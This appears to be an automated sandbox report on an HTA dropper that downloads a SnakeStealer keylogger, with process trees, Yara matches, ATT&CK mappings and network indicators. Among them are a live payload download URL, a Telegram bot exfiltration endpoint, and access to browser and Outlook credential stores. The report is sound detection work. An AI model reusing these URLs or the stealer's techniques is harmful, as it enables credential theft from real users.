                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll | VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00054E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00054E87
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00061E06 GetUserNameW,6_2_00061E06
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00053F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00053F3A
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_000249A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: csso.exe | Binary or memory string: WIN_81
                    Source: csso.exe | Binary or memory string: WIN_XP
                    Source: csso.exe | Binary or memory string: WIN_XPe
                    Source: csso.exe | Binary or memory string: WIN_VISTA
                    Source: csso.exe | Binary or memory string: WIN_7
                    Source: csso.exe | Binary or memory string: WIN_8
                    Source: csso[1].exe.3.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara match | File source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2527369873.0000000002766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00096283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00096283
                    Source: C:\Users\user\AppData\Roaming\csso.exe | Code function: 6_2_00096747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00096747
                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                    Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                    Execution: 11 Native API; 11 Command and Scripting Interpreter; 3 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                    Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                    Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 21 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection; Dynamic API Resolution
                    Credential Access: 1 OS Credential Dumping; 121 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                    Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 128 System Information Discovery; 231 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 System Network Configuration Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                    Collection: 11 Archive Collected Data; 1 Data from Local System; 11 Email Collection; 121 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                    Command and Control: 12 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                    Behavior Graph ID: 1636641 | Sample: uhg.hta | Startdate: 13/03/2025 | Architecture: WINDOWS | Score: 100
                    Start node: DNS/IP: reallyfreegeoip.org; checkip.dyndns.org; checkip.dyndns.com. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures. reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP).
                    mshta.exe (1) started. Signatures: Suspicious command line found; PowerShell case anomaly found.
                      cmd.exe (1) started by mshta.exe. Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found.
                        powershell.exe (43) started by cmd.exe. DNS/IP: 23.95.235.28, 49694, 80 AS-COLOCROSSINGUS United States. Dropped: C:\Users\user\AppData\Roaming\csso.exe (PE32); C:\Users\user\AppData\Local\...\csso[1].exe (PE32); C:\Users\user\AppData\...\hbmngfjp.cmdline (Unicode). Signatures: Loading BitLocker PowerShell Module; Powershell drops PE file.
                        conhost.exe started by cmd.exe.
                          csso.exe (2) started by powershell.exe. Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; 3 other signatures.
                            RegSvcs.exe (15 2) started by csso.exe. DNS/IP: checkip.dyndns.com 158.101.44.242, 49695, 80 ORACLE-BMC-31898US United States; reallyfreegeoip.org 104.21.80.1, 443, 49696 CLOUDFLARENETUS United States. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).
                          csc.exe (3) started by powershell.exe. Dropped: C:\Users\user\AppData\Local\...\hbmngfjp.dll (PE32).
                            cvtres.exe (1) started by csc.exe.

                    Source | Detection | Scanner | Label
                    uhg.hta | 34% | Virustotal |
                    uhg.hta | 24% | ReversingLabs | Script-WScript.Trojan.Asthma
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\csso.exe | 100% | Avira | TR/AD.SnakeStealer.nvufs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe | 100% | Avira | TR/AD.SnakeStealer.nvufs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exe | 71% | ReversingLabs | Win32.Spyware.Negasteal
                    C:\Users\user\AppData\Roaming\csso.exe | 71% | ReversingLabs | Win32.Spyware.Negasteal
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    http://23.95.235.28/50/csso.exe | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    reallyfreegeoip.org | 104.21.80.1 | true | false | | high
                    checkip.dyndns.com | 158.101.44.242 | true | false | | high
                    checkip.dyndns.org | unknown | unknown | false | | high
                    Name | Malicious | Antivirus Detection | Reputation
                    http://23.95.235.28/50/csso.exe | true | Avira URL Cloud: safe | unknown
                    https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                    http://checkip.dyndns.org/ | false | | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://crl.microsoft | powershell.exe, 00000003.00000002.1404410976.0000000007E17000.00000004.00000020.00020000.00000000.sdmp | false | | high
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://reallyfreegeoip.orgd | RegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://contoso.com/License | powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://contoso.com/Icon | powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://checkip.dyndns.org | RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.000000000267E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://reallyfreegeoip.org/xml/8.46.123.189l | RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://checkip.dyndns.comd | RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://checkip.dyndns.org/q | csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://contoso.com/ | powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1401229011.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://reallyfreegeoip.org/xml/8.46.123.189d | RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://reallyfreegeoip.org | RegSvcs.exe, 00000007.00000002.2527369873.00000000026AD000.00000004.00000800.00020000.00000000.sdmp | false
                                                                      high
                                                                      http://checkip.dyndns.orgdRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://checkip.dyndns.comRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://checkip.dyndns.org/dRegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1399001221.0000000004591000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002611000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.telegram.org/bot-/sendDocument?chat_id=csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.org/xml/csso.exe, 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
23.95.235.28 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1636641
Start date and time: 2025-03-13 01:17:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: uhg.hta
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 62
• Number of non-executed functions: 260
Cookbook Comments:
• Found application associated with file extension: .hta
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 2.16.185.191, 20.109.210.53
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
20:18:51 | API Interceptor | 42x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
23.95.235.28 | Neue Bestellung 236904.xls | malicious | Unknown | 23.95.235.28/xampp/rsc/uhg.hta
23.95.235.28 | Neue Bestellung 236904.xls | malicious | Unknown | 23.95.235.28/xampp/rsc/uhg.hta
23.95.235.28 | Bozza nuovo ordine 0010979742.xls | malicious | Unknown | 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
23.95.235.28 | Bozza nuovo ordine 0010979742.xls | malicious | Unknown | 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
23.95.235.28 | Bozza nuovo ordine 0010979742.xls | malicious | Unknown | 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
23.95.235.28 | kissingwithbestexperiencedgirlfriendonhereformenice.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | 23.95.235.28/560/vcc.exe
23.95.235.28 | niceskillbestexperiencegivenmegood.hta | malicious | Cobalt Strike, FormBook | 23.95.235.28/550/vcc.exe
23.95.235.28 | Nouvelle_commande9353834.xls | malicious | Unknown | 23.95.235.28/xampp/vn/v/kissingwithbestexperiencedgirlfriendonhereformenice.hta
158.101.44.242 | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | #rfq=O250116 - および購入契約- Offer Z01G-00008D SUPPLY - H64PO.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | niceworkingskillwithbestideasevermade.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | checkip.dyndns.org/
158.101.44.242 | rDatosbancarios.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | pbgjw8i8N7.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | bddTkmucZP.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | ctTrvHxBXO.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
158.101.44.242 | gC0avSHWrd.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
158.101.44.242 | Yl5gNdZgTd.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
checkip.dyndns.com | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 193.122.130.0
checkip.dyndns.com | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
checkip.dyndns.com | QUOTATION_FEBQUOTE312025PDF.scr.exe | malicious | MSIL Logger | 193.122.6.168
checkip.dyndns.com | PENDING PAYMENT FOR March SOA.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
checkip.dyndns.com | MALZEME G_0017 TABANCA SPREY NOZUL.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | Way bill & Invoice.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | 1.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
reallyfreegeoip.org | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
reallyfreegeoip.org | Payment_Advise.vbs | malicious | GuLoader, Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | 4500149631.vbe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
reallyfreegeoip.org | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
reallyfreegeoip.org | QUOTATION_FEBQUOTE312025PDF.scr.exe | malicious | MSIL Logger | 104.21.16.1
reallyfreegeoip.org | PENDING PAYMENT FOR March SOA.exe | malicious | Snake Keylogger | 104.21.64.1
reallyfreegeoip.org | Yeni Satınalma Siparişi.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.96.1
reallyfreegeoip.org | MALZEME G_0017 TABANCA SPREY NOZUL.exe | malicious | Snake Keylogger | 104.21.112.1
reallyfreegeoip.org | Way bill & Invoice.exe | malicious | Snake Keylogger | 104.21.96.1
reallyfreegeoip.org | 1.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://westmaidentrue.click/mirage/magestique | malicious | RedLine | 1.1.1.1
CLOUDFLARENETUS | load.exe | malicious | Unknown | 172.67.141.133
CLOUDFLARENETUS | Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe | malicious | Unknown | 104.26.13.205
CLOUDFLARENETUS | Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe | malicious | Unknown | 104.26.12.205
CLOUDFLARENETUS | Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe | malicious | Unknown | 104.26.13.205
CLOUDFLARENETUS | https://briefingmeetup.de | malicious | ScreenConnect Tool | 104.21.112.1
CLOUDFLARENETUS | http://bigdataframes.site | malicious | Unknown | 1.1.1.1
